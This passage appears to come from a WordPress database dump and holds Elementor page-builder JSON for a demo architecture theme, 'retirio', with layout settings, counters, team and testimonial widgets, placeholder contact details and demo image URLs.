applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\"},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3025,4741,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3026,4742,'_wp_page_template','elementor_header_footer'),(3027,4742,'_elementor_edit_mode','builder'),(3028,4742,'_elementor_template_type','wp-page'),(3029,4742,'_elementor_version','3.6.6'),(3030,4742,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Get to know us\",\"title\":\"Most experienced architects & designers\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are certain attributes of a profession and one has to catch hold of them in order to work efficiently and grow in that business. I share my experience as an interior designer, a profession of great esthetic value and charm.\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Mike Hardson\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_family\":\"Reey\",\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with 